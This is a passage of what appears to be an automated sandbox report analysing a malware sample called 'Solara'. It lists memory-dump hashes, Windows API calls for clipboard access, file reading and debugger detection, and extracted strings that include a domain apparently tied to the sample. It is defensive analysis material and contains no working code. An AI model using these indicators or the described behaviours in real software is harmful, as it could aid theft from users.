                                                                                                                                      • Instruction Fuzzy Hash: 59516071A20226BBDB20EFE5EC45EBE77B9AF25700F144465F905E7190E7709A70CB60
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 551'$551'$8B6B958200870298D0F23BE3BFA4D7B0$C$Z[$j5$wr$xd
                                                                                                                                      • API String ID: 0-996308183
                                                                                                                                      • Opcode ID: b3b8b64a22676f866b28c0f32f553feae2ec4960764cf6cf2fd47c979abda352
                                                                                                                                      • Instruction ID: 2bbbb439c78aaedf88cd82d2d06490bbb060edba9d361b7190003986e3ceddc9
                                                                                                                                      • Opcode Fuzzy Hash: b3b8b64a22676f866b28c0f32f553feae2ec4960764cf6cf2fd47c979abda352
                                                                                                                                      • Instruction Fuzzy Hash: 0DB1F5B560C3408FD318DF66C89166BBBE5EFD2314F14892DE5D29B382D7388509CB5A
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1006321803-0
                                                                                                                                      • Opcode ID: 4ecb37a96011bde20fcc7645bdc0b0f50f92a64914741eb937a6dbf712b64e30
                                                                                                                                      • Instruction ID: 81169a2a45bd25296fe3fa0d69fb8e9818515738a99f594ce1d4db5ab70cb8aa
                                                                                                                                      • Opcode Fuzzy Hash: 4ecb37a96011bde20fcc7645bdc0b0f50f92a64914741eb937a6dbf712b64e30
                                                                                                                                      • Instruction Fuzzy Hash: 325108B1D08B528FD700AFBC994936EBFA0AB06320F04873EE8A5976C1D378955587D7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: # $K,W"$p$v{B$*($64$><
                                                                                                                                      • API String ID: 0-3118935134
                                                                                                                                      • Opcode ID: 579d97964da7ca38581d62584efaed089f0d86a6c0647037bd8c4f0665b17e7c
                                                                                                                                      • Instruction ID: 4078d894f415666316d5bf7078af90d28ee8da83ef489743bc03fd894843b477
                                                                                                                                      • Opcode Fuzzy Hash: 579d97964da7ca38581d62584efaed089f0d86a6c0647037bd8c4f0665b17e7c
                                                                                                                                      • Instruction Fuzzy Hash: 6E61BDB16083918BD7349F28D8527ABBBF0EF82314F44892DD1C98B251DB798945CB5B
                                                                                                                                      APIs
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,002213BD,?,00000000), ref: 00221AA0
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,002213BD,?,00000000), ref: 00221AC9
                                                                                                                                      • GetACP.KERNEL32(?,?,002213BD,?,00000000), ref: 00221ADE
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                      • Opcode ID: 083d4a6b937a61f0097e7b146c2b83335e517912b1b1d0dc8692f519b0bec96c
                                                                                                                                      • Instruction ID: d907c4121d0182726d67f44ab989919fb8dcc51ed2078e6b879c80264922aa0b
                                                                                                                                      • Opcode Fuzzy Hash: 083d4a6b937a61f0097e7b146c2b83335e517912b1b1d0dc8692f519b0bec96c
                                                                                                                                      • Instruction Fuzzy Hash: B021B822B22122B6D7348FD4E904E9772AAEB74B54B968435E909D7100E731DE70C390
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $ "!$+ay+$. ,9$.%$9fI4$hD7;
                                                                                                                                      • API String ID: 0-3374441321
                                                                                                                                      • Opcode ID: 4525fc37a33f65980ab820d0b4ffd6f62496fe43c532b07e95198825b5b12c46
                                                                                                                                      • Instruction ID: 3c5089133fab0bd765ba1d8b8cc0b9f59daa44b6ad851400bf53d0a0666aed87
                                                                                                                                      • Opcode Fuzzy Hash: 4525fc37a33f65980ab820d0b4ffd6f62496fe43c532b07e95198825b5b12c46
                                                                                                                                      • Instruction Fuzzy Hash: 8081D6352087828AD709CF39886037BFFD19FE7304F1895AEE4D59B287D6398909C716
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00201240: _strlen.LIBCMT ref: 002012BA
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00202046
                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0020206B
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0020207A
                                                                                                                                      • _strlen.LIBCMT ref: 002020CD
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 002021FD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseFileHandle_strlen$ReadSize
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1490117831-0
                                                                                                                                      • Opcode ID: 0527a2d9d620dfc80bc2153705924f8898fbb8f1bd12d00b7d481e9736ad61b3
                                                                                                                                      • Instruction ID: 8cdffd46ab8303ac465272b80cad94489a2187e0791127cfaaf8fde27e2bb298
                                                                                                                                      • Opcode Fuzzy Hash: 0527a2d9d620dfc80bc2153705924f8898fbb8f1bd12d00b7d481e9736ad61b3
                                                                                                                                      • Instruction Fuzzy Hash: 6271B1B2D10319DFCB10DFA4DC497AEBBB5BF48310F140629E814A7392E73599698BA1
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,-$CRSP$mindhandru.buzz$JH$VBT
                                                                                                                                      • API String ID: 0-2820764157
                                                                                                                                      • Opcode ID: e280d1397c31dbd8898e29d8cdbfa637485b9278b4305355ac3f679eb988932a
                                                                                                                                      • Instruction ID: a326872bcfad62b3e096236d5f83fa90e4d7a2b6f3c67d078c43e8b1f804b917
                                                                                                                                      • Opcode Fuzzy Hash: e280d1397c31dbd8898e29d8cdbfa637485b9278b4305355ac3f679eb988932a
                                                                                                                                      • Instruction Fuzzy Hash: 8681D1B55483D18ED335CF2585817EBBFE1ABD2304F188A6DC4D96B381C7390906CBAA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                      • Instruction ID: 1b63e56013f978c6a94efebc621a8bcb3b6580830d976a0283ebb2b4bcd391c5
                                                                                                                                      • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                      • Instruction Fuzzy Hash: 33024C71E1121A9BDF14CFA8C8807EEB7F5FF58314F24826AE519E7341D731AA918B90
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: D]+\$L<$RCA$rEA
                                                                                                                                      • API String ID: 0-3246177857
                                                                                                                                      • Opcode ID: 36523a36bccb4e17342bed48d1493ec6649581383b7abc65ac82e0241de6d9b9
                                                                                                                                      • Instruction ID: 8b2f5974032e75d1abcfbd94c269e82fe70e0e90aabde0490a19ba4bbc2f83fe
                                                                                                                                      • Opcode Fuzzy Hash: 36523a36bccb4e17342bed48d1493ec6649581383b7abc65ac82e0241de6d9b9
                                                                                                                                      • Instruction Fuzzy Hash: 6B5257766082019BD718DF28DC517ABB3E2FFCA304F19893EE581873A1EB789945C749
                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0020F8F5
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0020F9C1
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0020F9DA
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0020F9E4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                      • Opcode ID: 7f4505ebfe792d6aa26ce1fce54198a4018c5bdf88f4610706efc795769c4e34
                                                                                                                                      • Instruction ID: e4db289d4a63e3b8690f5d7d23655091c1fc56526890f9e3de52ae14f5145c67
                                                                                                                                      • Opcode Fuzzy Hash: 7f4505ebfe792d6aa26ce1fce54198a4018c5bdf88f4610706efc795769c4e34
                                                                                                                                      • Instruction Fuzzy Hash: A131F675D1131DABDB61DFA4D9497CDBBB8AF08300F1081AAE40CAB290EB719A95CF45
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 01$FG$PGB$
                                                                                                                                      • API String ID: 0-3404118182
                                                                                                                                      • Opcode ID: 745afc0cc7dd846664ec5664b35ada90e17580a312ab5aa8006f63e573b13fc6
                                                                                                                                      • Instruction ID: 408d2189961acd78c3987564a95a34da749e70f3332da267077b818aa06fccc0
                                                                                                                                      • Opcode Fuzzy Hash: 745afc0cc7dd846664ec5664b35ada90e17580a312ab5aa8006f63e573b13fc6
                                                                                                                                      • Instruction Fuzzy Hash: DC22227A6183128BC324CF69D8912ABF3E2FFC5300F59892DD5C587361E7749905CB8A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ?ohm$ugB$zxa6$}
                                                                                                                                      • API String ID: 0-653187216
                                                                                                                                      • Opcode ID: e128a82c2b9e89712729df2ad22f61a7c951db08a4b225d195a566eae1d9e11c
                                                                                                                                      • Instruction ID: 06f4d584c6df524404a0e7d416c7f668235aa4230a2ea766c601a2d2db1b7e17
                                                                                                                                      • Opcode Fuzzy Hash: e128a82c2b9e89712729df2ad22f61a7c951db08a4b225d195a566eae1d9e11c
                                                                                                                                      • Instruction Fuzzy Hash: 3EF123B56083918BD300CF25E89172BBBE1AFD6308F19896EE5C49B381D739D805CB5B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,$0T$VP$Z]$
                                                                                                                                      • API String ID: 0-1140734058
                                                                                                                                      • Opcode ID: 39ef20b1fd791b491b64347a68af976ebab00b08b564c8fc42fc454c68d50c41
                                                                                                                                      • Instruction ID: ca5576e09d99e897cda90fae2235b3a944e3881cfc892fb19d0dd320387c42a7
                                                                                                                                      • Opcode Fuzzy Hash: 39ef20b1fd791b491b64347a68af976ebab00b08b564c8fc42fc454c68d50c41
                                                                                                                                      • Instruction Fuzzy Hash: 97C1247164C3508BD324CF29949026BBBE2ABD2704F18C93EE5D56B385D739D81ACB87
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +($jk$wq${u
                                                                                                                                      • API String ID: 0-3364037903
                                                                                                                                      • Opcode ID: ed1f88ab15146ea20f00ade5289919f30e2508cf1d396888c8e03355639199c6
                                                                                                                                      • Instruction ID: f00069a08531ed66de6e90fe5b49b38ba7189ab23d36caf79edaf2bcd9991edb
                                                                                                                                      • Opcode Fuzzy Hash: ed1f88ab15146ea20f00ade5289919f30e2508cf1d396888c8e03355639199c6
                                                                                                                                      • Instruction Fuzzy Hash: 06A1EEB59083018BC724DF28C8516ABB7F1FF85310F588A1DE8D58B391E738E985C79A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @yvH$IIHO$okWm$|AAO
                                                                                                                                      • API String ID: 0-3977483481
                                                                                                                                      • Opcode ID: 3d528a020da37f71f27cd83593dcd6cea8b04c5f76f60da3c281fd077c3f5bed
                                                                                                                                      • Instruction ID: ead6bea0579c26cfb174e072bb528aa289492c0dd679de58fee030b38c64b347
                                                                                                                                      • Opcode Fuzzy Hash: 3d528a020da37f71f27cd83593dcd6cea8b04c5f76f60da3c281fd077c3f5bed
                                                                                                                                      • Instruction Fuzzy Hash: 0F5146313583A58BE7308E6894813EBFBE1EBD5350F85493ED5C587382E23C9906D79A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: v$NA
                                                                                                                                      • API String ID: 0-3285912899
                                                                                                                                      • Opcode ID: 7eaad9629a3266ebc930e3711ca579da6a000e68e42694715771e7a81a4e7825
                                                                                                                                      • Instruction ID: 228c4c78f232b3fdc9f3dcfbc0d539ff9c1af9764f424dba29d49886aa30e314
                                                                                                                                      • Opcode Fuzzy Hash: 7eaad9629a3266ebc930e3711ca579da6a000e68e42694715771e7a81a4e7825
                                                                                                                                      • Instruction Fuzzy Hash: 5F7103B5908740DFD7309B14E8417ABB3A5FF86319F04453DE4894B362EB35A882CB9B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: N$Q[
                                                                                                                                      • API String ID: 0-3459853982
                                                                                                                                      • Opcode ID: 9ebf6519c99dd75030be15e6a727a0117085af5d46f595d0186b3348aa3d2bed
                                                                                                                                      • Instruction ID: 1102de8df2cc5530573bd31a70b3c3d2f7e675658d1c89c430694a195c2f9c9f
                                                                                                                                      • Opcode Fuzzy Hash: 9ebf6519c99dd75030be15e6a727a0117085af5d46f595d0186b3348aa3d2bed
                                                                                                                                      • Instruction Fuzzy Hash: D451F37164C31187C7049F25E8922ABB7F2EFA6314F08486DF9C45B391E339964AC79B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: N$Q[
                                                                                                                                      • API String ID: 0-3459853982
                                                                                                                                      • Opcode ID: 7f9cc37221207b23ecd00fcce42d5dee4acb7e68abeae8789e1d29ffe32b5575
                                                                                                                                      • Instruction ID: 8cb3fe215d730c7739647166da02980c01509862d16eec9086fa792282c2747c
                                                                                                                                      • Opcode Fuzzy Hash: 7f9cc37221207b23ecd00fcce42d5dee4acb7e68abeae8789e1d29ffe32b5575
                                                                                                                                      • Instruction Fuzzy Hash: 2151147064C31187C7049F25D8922ABB7F2EFA2314F08486DF9C45B381E33D964AC79A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 1296$B
                                                                                                                                      • API String ID: 0-1251279296
                                                                                                                                      • Opcode ID: 8a96e5860eb24be9f6b63c20d5d9b2e535ee221216b37142fd12bd390dd806c5
                                                                                                                                      • Instruction ID: 86492692862909a1efe5654092d4701e883d3d02905e21dddb8f10ab8e440b4f
                                                                                                                                      • Opcode Fuzzy Hash: 8a96e5860eb24be9f6b63c20d5d9b2e535ee221216b37142fd12bd390dd806c5
                                                                                                                                      • Instruction Fuzzy Hash: 32412671A093808BE314CF29D84179BBBE2ABD2320F148A6DF4D5973D5C7B9C8468B47
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4[$RE
                                                                                                                                      • API String ID: 0-2756277242
                                                                                                                                      • Opcode ID: 3000bd53f2ad615623c408e016e913863d8d7d72138c085fba8cfa7508d136e4
                                                                                                                                      • Instruction ID: 2b8fbb28d538d6e9e2e4f65ce2aa2b84f23e0c5f5a1dcbb08d99da414aae5b60
                                                                                                                                      • Opcode Fuzzy Hash: 3000bd53f2ad615623c408e016e913863d8d7d72138c085fba8cfa7508d136e4
                                                                                                                                      • Instruction Fuzzy Hash: E831FEB06493948FDB04CF219890AAFFBF1EBC2320F154A2DE4D55B290C7389946CB86
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: owA$L4
                                                                                                                                      • API String ID: 0-765284933
                                                                                                                                      • Opcode ID: 23b3c7023c61747a34dc76ef13d5e06b2464dd9ef29990b9ee06dbb1510347bd
                                                                                                                                      • Instruction ID: e3824644a8fb429865c603b8a363696f75faac3510a7d854f2e4cc00fafcc344
                                                                                                                                      • Opcode Fuzzy Hash: 23b3c7023c61747a34dc76ef13d5e06b2464dd9ef29990b9ee06dbb1510347bd
                                                                                                                                      • Instruction Fuzzy Hash: 0C21F376B1D3908BE734CB2485543ABB6D3ABD6720F29C53EC4C697316CB349942878B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: f
                                                                                                                                      • API String ID: 2994545307-1993550816
                                                                                                                                      • Opcode ID: 55419274909e3b661cfc6698c576cee513e24a1ff8f850c050a219275fded300
                                                                                                                                      • Instruction ID: 99d2d96c1fe3a32680c7fd0f3917c610481229326b232b374f031ad44cd2cd84
                                                                                                                                      • Opcode Fuzzy Hash: 55419274909e3b661cfc6698c576cee513e24a1ff8f850c050a219275fded300
                                                                                                                                      • Instruction Fuzzy Hash: 423246716083518FD718CF28C88172BBBE2EB89314F199A7EE6D587351D778DD018B8A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897830622.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: rvB
                                                                                                                                      • API String ID: 0-1233361888
                                                                                                                                      • Opcode ID: fe79a5e816022befe5a23ad39f115343c1358647311d702799e457fa692b784e
                                                                                                                                      • Instruction ID: ea5d5fe6dd4895e45a28bd51e94b7ee19f931a44b2ec468b03619dfb65c2ca21
                                                                                                                                      • Opcode Fuzzy Hash: fe79a5e816022befe5a23ad39f115343c1358647311d702799e457fa692b784e
                                                                                                                                      • Instruction Fuzzy Hash: 55021876A1C3658FC718DF28D81162FB7E1AFC5304F49863DE89597381EB34A905CB86
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
